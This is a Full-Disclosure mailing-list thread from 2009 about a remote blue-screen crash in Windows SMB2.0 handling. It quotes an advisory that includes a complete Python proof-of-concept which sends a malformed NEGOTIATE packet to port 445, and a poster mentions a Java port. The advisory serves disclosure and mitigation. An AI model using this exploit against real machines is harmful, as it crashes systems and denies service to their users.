[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.



Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
> After testing my version of the exploit (using Java instead of Python) I
> tried it against a Windows Server 2008 R2 installation - it went down.
>
> http://www.procyonlabs.com/software/smb2_bsoder
>
> Randy
>
>
> laurent gaffie wrote:
>> Advisory updated :
>>
>>
>> =============================================
>> - Release date: September 7th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: High
>> =============================================
>>
>> I. VULNERABILITY
>> -------------------------
>> Windows Vista, Server 2008 < R2, 7 RC :
>> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> -------------------------
>> Windows vista and newer Windows comes with a new SMB version named SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> -------------------------
>> [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
>> patch, for another SMB2.0 security issue:
>> KB942624 (MS07-063)
>> Installing only this specific update on Vista SP0 create the following
>> issue:
>>
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionnality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
>> SMB server, and it's used to identify the SMB dialect that will be used
>> for futher communication.
>>
>> IV. PROOF OF CONCEPT
>> -------------------------
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>>
>> from socket import socket
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> -------------------------
>> An attacker can remotly crash any Vista/Windows 7 machine with SMB
>> enable.
>> Windows Xp, 2k, are NOT affected as they dont have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> -------------------------
>> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
>> < R2, Windows 7 RC.
>>
>> VII. SOLUTION
>> -------------------------
>> No patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>> Configure your firewall properly
>> You can also follow the MS Workaround:
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>>
>> VIII. REFERENCES
>> -------------------------
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
>>
>> IX. CREDITS
>> -------------------------
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com>
>>
>> X. REVISION HISTORY
>> -------------------------
>> September 7th, 2009: Initial release
>> September 11th, 2009: Revision 1.0 release
>>
>> XI. LEGAL NOTICES
>> -------------------------
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> XII.Personal Notes
>> -------------------------
>> Many persons have suggested to update this advisory for RCE and not
>> BSOD:
>> It wont be done, if they find a way to execute code, they will publish
>> them advisory.
>
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/